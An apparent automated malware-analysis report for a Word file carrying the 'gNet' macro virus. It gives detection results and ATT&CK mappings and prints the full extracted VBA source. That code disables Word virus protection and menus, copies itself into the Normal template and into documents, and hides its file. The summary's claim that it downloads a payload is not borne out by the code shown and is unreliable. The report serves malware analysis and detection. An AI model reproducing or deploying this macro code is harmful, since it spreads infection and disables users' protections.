MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
T1547.001 Registry Run Keys / Startup Folder
The sample is a Word document with VBA macros, identified as the 'gNet' macro virus. The macros contain a Shell() call to execute 'attrib +h gnet.vxd', indicating an attempt to hide a downloaded payload. The script also attempts to export itself to 'c:\gnet.vxd' and potentially establish persistence, suggesting it acts as a downloader for a secondary malicious artifact.
Heuristics 3
-
ClamAV: Doc.Trojan.VMPCK1-12 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.VMPCK1-12
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2195 bytes |
SHA-256: 58ca35c34c3482540bba9b184f8c5625a96abc0083fa77db4f2c804b0d607bad |
|||
|
Detection
ClamAV:
Doc.Trojan.VMPCK1-12
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "gnet"
' This is gNet Macro Virus
' (c) 1999 by ksg
' astigmatiZm virus group
' www.astigmatiZm.cjb.net
' rename this file to gNet.bas and import it in MS Words Visual Basic Editor to activate
'
' WM97.gNet
' ---------------------
' (c) by KSG [ AMACC ]
' ---------------------
' [ Astig Matizm ]
'
Sub gnet()
On Error Resume Next
Set a = NormalTemplate: Set b = a.VBProect
Set c = b.VBComponents(1): Set d = c.Item
Set vp = Options.VirusProtection
Options.ConfirmConversions = False
vp = (Rnd * 0)
Options.SaveNormalPrompt = (Rnd * 0)
b.VBComponents("gnet").Export "c:\gnet.vxd"
ActiveDocument.ReadOnlyRecommended = False
If d("gnet").Name <> "gnet" Then
NotYet = True
If ActiveDocument.VBProject.VBComponents.Item("gnet").Name <> "gnet" Then Still = True
If NotYet = True And Still = False Then Set Blink1 = NormalTemplate.VBProject.VBComponents
If NotYet = False And Still = True Then Set Blink1 = ActiveDocument.VBProject.VBComponents
Blink1.import "c:\gnet.vxd"
If activeinst = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
If Still = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
CommandBars("tools").Controls("Macro").Enabled = False
CommandBars("tools").Controls("Customize...").Enabled = False
CommandBars("view").Controls("Toolbars").Enabled = False
CommandBars("view").Controls("Status Bar").Enabled = False
Shell "attrib +h gnet.vxd", vbHide
End Sub
Sub AutoExec()
On Error Resume Next
If Day(Now()) = 10 And Month(Now()) = 9 Then
Call HelpAbout
End If
Call gnet
End Sub
Sub HelpAbout()
On Error Resume Next
Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "g N e t , 2 1 , k s g"
.Heading = "gNeT [ ksg / astigmatiZm ]"
.Animation = msoAnimationSearching
.Show
End With
Assistant.Visible = False
Call gnet
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.